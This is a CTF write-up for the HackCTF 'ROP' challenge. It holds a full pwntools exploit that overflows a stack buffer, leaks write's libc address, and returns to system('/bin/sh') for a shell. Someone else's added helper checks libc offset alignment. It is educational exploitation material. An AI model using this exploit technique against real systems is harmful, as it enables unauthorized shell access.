
[HackCTF] ROP (300) write-up

m3r0n4 2020. 12. 24. 02:28

It's just plain x86 ROP; knock it out quickly.

1. Exploit

from pwn import *

p = remote('ctf.j0n9hyun.xyz', 3021)
#p = process('./rop')
e = ELF('./rop')
#libc = e.libc
libc = ELF('libc.so.6')   # libc shipped with the challenge

write_plt = e.plt['write']
write_got = e.got['write']
pppr = 0x08048509        # pop; pop; pop; ret gadget to clean up write's 3 args

# Stage 1: overflow the 0x88-byte buffer + saved ebp, then call
# write(1, write_got, 4) and return to main for a second round.
payload = b"A" * (0x88 + 4)
payload += p32(write_plt)
payload += p32(pppr)
payload += p32(1)
payload += p32(write_got)
payload += p32(4)
payload += p32(e.symbols['main'])

p.sendline(payload)

# The 4 bytes written back are the runtime address of write() in libc.
write_addr = u32(p.recv(4))
log.success(hex(write_addr))
libc_base = write_addr - libc.symbols['write']
system_addr = libc_base + libc.symbols['system']
binsh = libc_base + next(libc.search(b'/bin/sh\x00'))

# Stage 2: classic ret2libc, system("/bin/sh") with a dummy return address.
payload = b"A" * (0x88 + 4)
payload += p32(system_addr)
payload += b"AAAA"
payload += p32(binsh)

p.sendline(payload)

p.interactive()


Since the libc is simply provided, leak a libc address through the write function, use it to find the addresses of the system function and the "/bin/sh" string, and do RTL (return-to-libc) with those.
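The step the write-up relies on is the arithmetic from one leaked GOT pointer to the libc base and the other symbols, and the usual way that goes wrong is using offsets from a libc build that does not match the one actually loaded. The added example below (my code, not part of the write-up) isolates that step and adds the sanity check a practitioner wants: a libc base computed from correct offsets is always page-aligned, so a misaligned result almost certainly means the wrong libc. The symbol offsets and the leaked value are constructed placeholders, not the challenge's real libc.

```python
# Added example: resolve libc addresses from a single leaked pointer and
# sanity-check the result. Not from the original write-up.

PAGE = 0x1000  # libc is mapped at a page boundary


def resolve_libc(leaked_addr, leaked_sym, symbols):
    """Return (libc_base, {symbol: runtime address}).

    leaked_addr: runtime address read back from the GOT.
    leaked_sym:  name of the symbol that address belongs to.
    symbols:     offset table of the libc believed to be loaded
                 (pwntools' ELF('libc.so.6').symbols has this shape).

    Raises ValueError if the implied base is not page-aligned, which is the
    classic symptom of offsets taken from a different libc build.
    """
    base = leaked_addr - symbols[leaked_sym]
    if base & (PAGE - 1):
        raise ValueError("libc base %#x is not page-aligned: wrong libc offsets?" % base)
    return base, {name: base + off for name, off in symbols.items()}


def leak_is_consistent(leaked_addr, leaked_sym, symbols):
    """True if the leaked pointer and the offset table agree on a page-aligned base."""
    try:
        resolve_libc(leaked_addr, leaked_sym, symbols)
        return True
    except ValueError:
        return False


# Constructed offsets (placeholders, not the challenge's libc).
SAMPLE_SYMBOLS = {
    "write": 0x000D43C0,
    "system": 0x0003ADA0,
    "str_bin_sh": 0x0015BA0B,  # offset of the "/bin/sh" string
}


def demo(leaked_write=0xF7E3F3C0):
    """Walk the write-up's stage-1 result through to the stage-2 addresses."""
    base, addrs = resolve_libc(leaked_write, "write", SAMPLE_SYMBOLS)
    return base, addrs["system"], addrs["str_bin_sh"]


if __name__ == "__main__":
    base, system_addr, binsh = demo()
    print("libc base   %#x" % base)
    print("system      %#x" % system_addr)
    print("/bin/sh     %#x" % binsh)
    print("off-by-one leak consistent?",
          leak_is_consistent(0xF7E3F3C1, "write", SAMPLE_SYMBOLS))
```

With real pwntools objects you would pass `libc.symbols` as the table and, for the string, use `libc.search(b'/bin/sh\x00')` as the write-up does; the alignment check costs nothing and catches a mismatched libc before the second payload is sent and the connection is lost.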